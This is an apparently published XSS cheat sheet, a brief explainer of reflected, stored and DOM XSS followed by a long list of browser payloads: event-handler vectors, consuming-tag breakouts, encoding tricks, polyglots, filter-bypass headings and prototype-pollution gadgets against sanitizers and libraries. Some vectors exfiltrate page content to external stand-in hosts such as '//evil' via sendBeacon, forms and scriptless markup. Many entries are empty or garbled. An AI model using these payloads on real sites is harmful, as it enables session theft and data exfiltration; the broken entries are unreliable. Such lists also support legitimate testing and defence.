Sameeksha Medewar | 30 Jan, 2025

Download XSS Cheat Sheet PDF for Quick References

XSS or Cross-Site Scripting is an injection executed to make a web application’s user interactions vulnerable to cyber attacks. This can cause high damage to the websites and compromise web security. Cross-Site Scripting (XSS) is still one of the most prevalent security flaws detected in online applications today. Therefore, all web developers must consider the severity of XSS when creating websites. 

XSS has many commands, event handlers, frameworks, consuming tags, scriptless attacks, encoding, and useful attributes. We’ll cover all those, along with a brief introduction to XSS and XSS test strings, with this XSS cheat sheet. This is your one-stop shop for XSS commands and more.

Click here to download’s XSS Cheat Sheet PDF.

What is XSS?

Cross-Site Scripting (XSS) is a sort of injection in which an attacker injects a script (typically Javascript) into a website. It’s then left unprocessed and permitted to remain in the browser, allowing the script to run as if the administrator themselves created it.

This injection might change the display, modify the browser, or even take your session cookie and sign in as an administrator, giving the hacker total access to your computer.

The term "could" is used since there is a lot of ambiguity regarding the XSS vulnerability and its potential repercussions. Consider the XSS flaw to be a dormant pathogen. Human infections remain dormant until something causes them to appear physically, and XSS vulnerabilities require some type of activity, whether it's social engineering or someone visiting a page and clicking a button. This might happen right away or take some time. In other ways, this adds a new degree of risk because engineers can't design a patch if they don't even know the vulnerability exists.

Types of XSS Attacks

There are three types of XSS attacks:

  1. Reflected XSS
  2. Store XSS
  3. DOM-Based XSS

Reflected XSS: A low-severity XSS attack in which the attacker injects Javascript into a website, but the script only affects their own browser. No other user will be harmed by any script the hacker injects. 

Store XSS: In this sort of XSS, the attacker injects malicious code into the website, which the attacker then saves in the database. Every person who visits this page and sends an http request to the server will be impacted. 

DOM XSS: An attacker injects Javascript code into the html DOM in this XSS attack. Finding DOM-based XSS is a little time consuming, but most websites are vulnerable to this type of XSS. A high-severity attack, it is impossible for the server to halt it. Here are a few examples of the impact:

  1. Stealing authentication cookies. An attacker’s Javascript can grab an entire document cookie collection and send it to a URL controlled by the attacker. This attacker can impersonate you (from the perspective of the target website) and do any operation (purchases, sending messages, and sending money as you).
  2. Extra HTML tags are injected to capture more information. For example, an XSS on a bank's website may create an SSN field that looks exactly like the other fields on the page. A user might be duped into providing personal information.
  3. XSS can result in CSRF. A page with a translucent overlay layer over it may fool a user into believing they're clicking on something totally different.

Learn Ethical Hacking From Scratch

Event Handlers 

Event handlers are JavaScript functions that perform specific actions based on events. In this section of our XSS prevention cheat sheet, we’ll cover various event handlers. 


Fires when a CSS animation is canceled

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="print()"></xss>


Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>


Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>


Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>


Fires before the page is printed

<body onbeforeprint=console.log(1)>


Fires before the script is executed

<xss onbeforescriptexecute=alert(1)><script>1</script>


Triggered when the URL changes

<body onbeforeunload=navigator.sendBeacon('//',document.body.innerHTML)>


Starts when an svg animation begins

<svg><animate onbegin=alert(1) attributeName=x dur=1s>


Occurs when the marquee bounces

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>


If the resource can be used, it will get fired.

<audio oncanplay=alert(1)><source src="audio.wav" type="audio/wav"></audio>


When there is enough data loaded to play the resource all the way through, this event handler fires.

<video oncanplaythrough=alert(1)><source src="video.mp4" type="video/mp4"></video>


Occurs when the subtitle changes

<video controls><source src=video.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>


Occurs when duration changes

<audio controls ondurationchange=alert(1)><source src=audio.mp3 type=audio/mpeg></audio>


Fires when an svg animation ends

<svg><animate onend=alert(1) attributeName=x dur=1s>


Triggers when the resource is finished playing

<audio controls autoplay onended=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Occurs when the resource fails to load or causes an error

<audio src/onerror=alert(1)>


Triggers when the marquee finishes

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>

Onfocus and onfocusin

Triggers when the element has focus

<a id=x tabindex=1 onfocus=alert(1)></a>


Triggers If the hash changes

<body onhashchange="print()">


Triggers when the element is loaded

<body onload=alert(1)>


Triggers when the first frame is loaded

<audio onloadeddata=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Triggers when the metadata is loaded

<audio autoplay onloadedmetadata=alert(1)> <source src="audio.wav" type="audio/wav"></audio>


Fires when the element finishes loading

<image src=image.png onloadend=alert(1)>


Occurs when the element begins to load

<image src=image.png onloadstart=alert(1)>


Occurs when a message event is received from a postMessage call

<body onmessage=print()>


Triggers when the page is shown

<body onpageshow=alert(1)>

Onplay and onplaying

Gets fired when the resource is played

<audio autoplay onplay=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Triggers when the history changes

<body onpopstate=print()>


Fired when the video/audio begins downloading

<audio controls onprogress=alert(1)><source src=audio.mp3 type=audio/mpeg></audio>


Triggers when an svg animation repeats

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />


Triggers when the window is resized

<body onresize="print()">


Occurs when the page scrolls

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>


Triggers when the marquee starts

<marquee onstart=alert(1)>XSS</marquee>


Fied when the timeline is changed

<audio controls autoplay ontimeupdate=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Triggers when the details tag is expanded

<details ontoggle=alert(1) open>test</details>


Fires when a CSS transition cancels

<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=print()></xss>


Gets triggered when a CSS transition ends

<xss id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></xss>


Triggers when a CSS transition begins

<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=print()></xss>


Gets fired when a CSS transition starts

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>


Triggers when a promise isn't handled

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>


Triggers when the page is unloaded

<body onunload=navigator.sendBeacon('//',document.body.innerHTML)>


Triggers when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>


Gets fired when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>


Triggers when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>


Triggers when a CSS transition ends

<style>:target {color:red;}</style><xss id=x style="transition:color element loses focus1s" onwebkittransitionend=alert(1)></xss>


Fires after the page is printed

<body onafterprint=alert(1)>


Fires when right-clicking or using the middle button of the mouse

<input onauxclick=alert(1)>


Requires you to copy a piece of text

<a onbeforecopy="alert(1)" contenteditable>test</a>


Requires you to cut a piece of text

<a onbeforecut="alert(1)" contenteditable>test</a>


Fires when an element loses focus

<xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>


Requires a change of value

<input onchange=alert(1) value=xss>


Requires a click of the element

<xss onclick="alert(1)" style=display:block>test</xss>


Fires when a dialog is closed

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>


Triggered when right clicking to show the context menu

<xss oncontextmenu="alert(1)" style=display:block>test</xss>


Requires you copy a piece of text

<xss oncopy=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test


Requires you cut a piece of text

<xss oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test


Triggered when double-clicking the element

<xss ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</xss>


Triggered when dragging the element

<xss draggable="true" ondrag="alert(1)" style=display:block>test</xss>


Triggered dragging is finished on the element

<xss draggable="true" ondragend="alert(1)" style=display:block>test</xss>


Requires a mouse drag

<xss draggable="true" ondragenter="alert(1)" style=display:block>test</xss>


Requires a mouse drag

<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>


Triggered dragging over an element

<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable style=display:block>drop here</xss>


Requires a mouse drag

<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>


Triggered dropping a draggable element

<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable style=display:block>drop here</xss>


Fires when an element loses focus

<xss onfocusout=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>


Fires when a video changes full-screen status

<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>


Requires a change of value

<input oninput=alert(1) value=xss>


Requires a form submission with an element that does not satisfy its constraints, such as a required attribute

<form><input oninvalid=alert(1) required><input type=submit>


Triggered when a key is pressed

<xss onkeydown="alert(1)" contenteditable style=display:block>test</xss>


Triggered when a key is pressed

<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>


Triggered when a key is released

<xss onkeyup="alert(1)" contenteditable style=display:block>test</xss>


Triggered when the mouse is pressed

<xss onmousedown="alert(1)" style=display:block>test</xss>


Triggered when the mouse hovers over the element

<xss onmouseenter="alert(1)" style=display:block>test</xss>


Triggered when the mouse is moved away from the element

<xss onmouseleave="alert(1)" style=display:block>test</xss>


Requires mouse movement

<xss onmousemove="alert(1)" style=display:block>test</xss>


Triggered when the mouse is moved away from the element

<xss onmouseout="alert(1)" style=display:block>test</xss>


Requires a hover over the element

<xss onmouseover="alert(1)" style=display:block>test</xss>


Triggered when the mouse button is released

<xss onmouseup="alert(1)" style=display:block>test</xss>


Fires when the mouse wheel scrolls

<xss onmousewheel=alert(1) style=display:block>requires scrolling


Fires when a video changes full-screen status

<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>


Fires when the page is changed

<body onpagehide=navigator.sendBeacon('//',document.body.innerHTML)>


Requires you paste a piece of text

<a onpaste="alert(1)" contenteditable>test</a>


Requires clicking the element to pause

<audio autoplay controls onpause=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Fires when the mouse down

<xss onpointerdown=alert(1) style=display:block>XSS</xss>


Fires when the mouse enters

<xss onpointerenter=alert(1) style=display:block>XSS</xss>


Fires when the mouse leaves

<xss onpointerleave=alert(1) style=display:block>XSS</xss>


Fires when the mouse moves

<xss onpointermove=alert(1) style=display:block>XSS</xss>


Fires when the mouse leaves

<xss onpointerout=alert(1) style=display:block>XSS</xss>


Fires when the mouseover (the mouse points to a selected element) event takes place

<xss onpointerover=alert(1) style=display:block>XSS</xss>


Fires when the pointer changes

<xss onpointerrawupdate=alert(1) style=display:block>XSS</xss>


Fires when the mouse up

<xss onpointerup=alert(1) style=display:block>XSS</xss>


Requires a click

<form onreset=alert(1)><input type=reset>


Fires when a form is submitted and the input has a type attribute of search

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>


Requires clicking the element timeline

<audio autoplay controls onseeked=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Requires clicking the element timeline

<audio autoplay controls onseeking=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Requires you select text

<input onselect=alert(1) value="XSS" autofocus>


Fires when text selection is changed on the page

<body onselectionchange=alert(1)>select some text


Fires when beginning a text selection

<body onselectstart=alert(1)>select some text


Fires context menu is shown

<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>


Requires a form submission

<form onsubmit=alert(1)><input type=submit>


Fires when the touch screen, only mobile device

<body ontouchend=alert(1)>


Fires when touches the screen and moves, only mobile device

<body ontouchmove=alert(1)>


Fires when touches the screen, only mobile device

<body ontouchstart=alert(1)>


Requires volume adjustment

<audio autoplay controls onvolumechange=alert(1)><source src="audio.wav" type="audio/wav"></audio>


Fires when you use the mouse wheel

<body onwheel=alert(1)>

Consuming Tags

Next up on our XSS injection cheat sheet, we will walk you through different consuming tags. 

Noembed Consuming Tag

<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>

Noscript Consuming Tag

<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>

Style Consuming Tag

<style><img title="</style><img src onerror=alert(1)>"></style>

Script Consuming Tag

<script><img title="</script><img src onerror=alert(1)>"></script>

iframe Consuming Tag

<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>

xmp Consuming Tag

<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>

textarea Consuming Tag

<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>

noframes Consuming Tag

<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>

Title Consuming Tag

<title><img title="</title><img src onerror=alert(1)>"></title>

File Upload Attacks

Add Blob to File Object

<input type="file" id="fileInput" /><script>const fileInput = document.getElementById('fileInput');const dataTransfer = new DataTransfer();const file = new File(['Demo!'], 'demo.txt', {type: 'text/plain'});dataTransfer.items.add(file);fileInput.files = dataTransfer.files</script>

Restricted Characters

This section of our cross-site scripting cheat sheet discusses restricted characters. 

No parentheses using exception handling

<script>onerror=alert;throw 1</script>

No parentheses using exception handling, no semicolons

<script>{onerror=alert}throw 1</script>

No parentheses using exception handling, no semicolons using expressions

<script>throw onerror=alert,1</script>

No parentheses using exception handling and eval

<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox


No parentheses using ES6 hasInstance and instanceof with eval


No parentheses using ES6 hasInstance and instanceof with eval without .


No parentheses using location redirect


No parentheses using location redirect no strings


No parentheses using template strings


No parentheses using template strings and location hash

<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces, using template strings and location hash

<video><source onerror=location=/\>

XSS without greater than

<svg onload=alert(1)

Array-based destructuring using onerror


Destructuring using onerror

<script>var{a:onerror}={a:alert};throw 1</script>

Destructuring using default values and onerror

<script>var{haha:onerror=alert}=0;throw 1</script>

Vector using

<script>'javascript:alert(1)';</script><svg onload=location=name>


Bootstrap onanimationstart event

<xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event

<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>


In this section of the OWASP XSS cheat sheet, we’ll cover various XSS protocols. 

Iframe src attribute JavaScript protocol

<iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol

<object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol

<embed src="javascript:alert(1)">

A standard JavaScript protocol

<a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive

<a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol

<a href=" javascript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed inside the protocol

<a href="javas cript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed after protocol name before the colon

<a href="javascript :alert(1)">XSS</a>
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src

<script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag

<svg><script href="data:text/javascript,alert(1)" />

SVG use element Chrome/Firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='' xmlns:xlink='' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL


Base tag with JavaScript protocol rewriting relative URLS

<base href="javascript:/a/-alert(1)///////"><a href=../lol/page.html>test</a>

MathML makes any tag clickable

<math><x href="javascript:alert(1)">blah

Button and formaction

<form><button formaction=javascript:alert(1)>XSS

Input and formaction

<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action

<form action=javascript:alert(1)><input type=submit value=XSS>

Animate tag with keytimes and multiple values

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values=";javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

JavaScript protocol with new line

<a href="javascript://%0aalert(1)">XSS</a>

Data URL with use element and base64 encoded

<svg><use href="#x" /></svg>

Data URL with use element

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns=''&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />

Animate tag with auto executing use element

<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,&lt;svg id='x' xmlns=''&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" /><use id=x />

Other Useful Attributes

Using srcdoc attribute

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities

<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage

<a href=# download="filename.html">Test</a>

Disable referrer using referrerpolicy

<img referrerpolicy="no-referrer" src="//">

Set via parameter on the function

<a href=# onclick="';eval(name)//','alert(1)')">XSS</a>

Set via name attribute in a <iframe> tag

<iframe name="alert(1)" src=";eval(name)//"></iframe>

Set via target attribute in a <base> tag

<base target="alert(1)"><a href=";eval(name)//">XSS via target in base tag</a>

Set via target attribute in a <a> tag

<a target="alert(1)" href=";eval(name)//">XSS via target in a tag</a>

Set via usemap attribute in a <img> tag

<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href=">alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>ring_single&x=%27;eval(name)//"></map>

Set via target attribute in a <form> tag

<form action="" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set via formtarget attribute in a <input> tag type submit

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set via formtarget attribute in a <input> tag type image

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special Tags

Now, let’s move on to explore various special tags used for XSS. 

Redirect to a different domain

<meta http-equiv="refresh" content="0; url=//">

Meta charset attribute UTF-7

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 1

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 2

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 3

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 4

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox

<iframe sandbox src="//"></iframe>

Disable referer

<meta name="referrer" content="no-referrer">


Overlong UTF-8


Unicode escapes ES6 style


Unicode escapes ES6 style zero padded


Hex encoding JavaScript escapes


Octal encoding

<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semicolon

<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding

<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros

<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities

<a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semicolon provided next character is not a-f0-9

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros

<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive

<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities

<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

HTML entities and URL encoding

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>


Data protocol inside script src with base64

<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and HTML entities

<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL encoding

<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>

Iframe srcdoc HTML encoded

<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>

Iframe JavaScript URL with HTML and URL encoding

<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>

SVG script with unicode escapes and HTML encoding


Img tag with base64 encoding

<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>

Background attribute

<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Scriptless Attacks

<link rel=stylesheet href="//evil?
<link rel=icon href="//evil?

Meta refresh

<meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute

<img src="//evil? <image src="//evil?

Video using track element

<video><track default src="//evil?

Video using source element and src attribute

<video><source src="//evil?

Audio using source element and src attribute

<audio><source src="//evil?

Input src

<input type=image src="//evil?

Button using formaction

<form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction

<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action

<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data

<object data="//evil?

Iframe src

<iframe src="//evil?

Embed src

<embed src="//evil?

Use textarea to consume markup and post to external site

<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through using form target

<button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through using base target

<a href=><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through using formtarget

<form><input type=submit value="Click me" formaction= formtarget="

Using base href to pass data

<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page

<embed src= name="

Using iframe window name to pass data from the page

<iframe src= name="

Using object window name to pass data from the page

<object data= name="

Using frame window name to pass data from the page

<frameset><frame src= name="

Overwrite type attribute with image in hidden inputs

<input type=hidden type=image src="//evil?


Polyglot payload 1


Polyglot payload 2

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3


WAF Bypass Global Objects

XSS into a JavaScript string: string concatenation (window)


XSS into a JavaScript string: string concatenation (self)


XSS into a JavaScript string: string concatenation (this)


XSS into a JavaScript string: string concatenation (top)


XSS into a JavaScript string: string concatenation (parent)


XSS into a JavaScript string: string concatenation (frames)


XSS into a JavaScript string: string concatenation (globalThis)


XSS into a JavaScript string: comment syntax (window)


XSS into a JavaScript string: comment syntax (self)


XSS into a JavaScript string: comment syntax (this)


XSS into a JavaScript string: comment syntax (top)


XSS into a JavaScript string: comment syntax (parent)


XSS into a JavaScript string: comment syntax (frames)


XSS into a JavaScript string: comment syntax (globalThis)


XSS into a JavaScript string: hex escape sequence (window)


XSS into a JavaScript string: hex escape sequence (self)


XSS into a JavaScript string: hex escape sequence (this)


XSS into a JavaScript string: hex escape sequence (top)


XSS into a JavaScript string: hex escape sequence (parent)


XSS into a JavaScript string: hex escape sequence (frames)


XSS into a JavaScript string: hex escape sequence (globalThis)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)


XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)


XSS into a JavaScript string: octal escape sequence (window)


XSS into a JavaScript string: octal escape sequence (self)


XSS into a JavaScript string: octal escape sequence (this)


XSS into a JavaScript string: octal escape sequence (top)


XSS into a JavaScript string: octal escape sequence (parent)


XSS into a JavaScript string: octal escape sequence (frames)


XSS into a JavaScript string: octal escape sequence (globalThis)


XSS into a JavaScript string: unicode escape (window)


XSS into a JavaScript string: unicode escape (self)


XSS into a JavaScript string: unicode escape (this)


XSS into a JavaScript string: unicode escape (top)


XSS into a JavaScript string: unicode escape (parent)


XSS into a JavaScript string: unicode escape (frames)


XSS into a JavaScript string: unicode escape (globalThis)


XSS into a JavaScript string: RegExp source property (window)


XSS into a JavaScript string: RegExp source property (self)


XSS into a JavaScript string: RegExp source property (this)


XSS into a JavaScript string: RegExp source property (top)


XSS into a JavaScript string: RegExp source property (parent)


XSS into a JavaScript string: RegExp source property (frames)


XSS into a JavaScript string: RegExp source property (globalThis)


XSS into a JavaScript string: Hieroglyphy/JSFuck (window)


XSS into a JavaScript string: Hieroglyphy/JSFuck (self)


XSS into a JavaScript string: Hieroglyphy/JSFuck (this)


XSS into a JavaScript string: Hieroglyphy/JSFuck (top)


XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)


XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)


XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)


Content Type

This section of our XSS cheat sheet lists content types that can be used for XSS with the X-Content-Type-Options: nosniff header active along with their PoCs.




<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>


<x : script xmlns : x="">alert(document.domain)</x:script>





Prototype Pollution

This next section covers different prototype pollution attacks, along with their XSS payloads. 

Wistia Embedded Video


Object.prototype.innerHTML = '<img/src/onerror=alert(1)>';


$(x).off jQuery





/* No extra code needed for jQuery 1 & 2 */$(document).off('foobar');


$(html) jQuery


Object.prototype.div=['1','<img src onerror=alert(1)>','1']


$('<div x="x"></div>')


$.get jQuery


Object.prototype.url = ['data:,alert(1)//'];

Object.prototype.dataType = 'script';






$.getScript jQuery


Object.prototype.src = ['data:,alert(1)//']





$.getScript jQuery


Object.prototype.url = 'data:,alert(1)//'





Google reCAPTCHA




<div class="g-recaptcha" data-sitekey="your-site-key"/>

Twitter Universal Website Tag


Object.prototype.hif = ['javascript:alert(document.domain)'];


Tealium Universal Tag


Object.prototype.attrs = {src:1};



Akamai Boomerang

<script>Object.prototype.BOOMR = 1;




Object.prototype.sourceURL = '\u2028\u2029alert(1)'







Object.prototype['*'] = ['onload']</script>


document.write(sanitizeHtml('<iframe onload=alert(1)>'))




Object.prototype.whiteList = {img: ['onerror', 'src']}



document.write(filterXSS('<img src onerror=alert(1)>'))




Object.prototype.ALLOWED_ATTR = ['onerror', 'src']



document.write(DOMPurify.sanitize('<img src onerror=alert(1)>'))




Object.prototype.documentMode = 9




const html = '<img src onerror=alert(1)>';

const sanitizer = new goog.html.sanitizer.HtmlSanitizer();

const sanitized = sanitizer.sanitize(html);

const node = goog.dom.safeHtmlToNode(sanitized);





Object.prototype.CLOSURE_BASE_PATH = 'data:,alert(1)//';


Marionette.js / Backbone.js


Object.prototype.tagName = 'img'

Object.prototype.src = ['x:x']

Object.prototype.onerror = ['alert(1)']



(function() {

var View = Mn.View.extend({template: '#template-layout'});

var App = Mn.Application.extend({region: '#app', onStart: function() {this.showView(new View());}});

var app = new App();




<div id="template-layout" type="x-template/underscore">xxx</div>

Adobe Dynamic Tag Management




Embedly Cards


Object.prototype.onload = 'alert(1)'


Segment Analytics.js


Object.prototype.script = [1,'<img/src/onerror=alert(1)>','<img/src/onerror=alert(2)>']



<strong data-bind="text:'hello'"></strong>







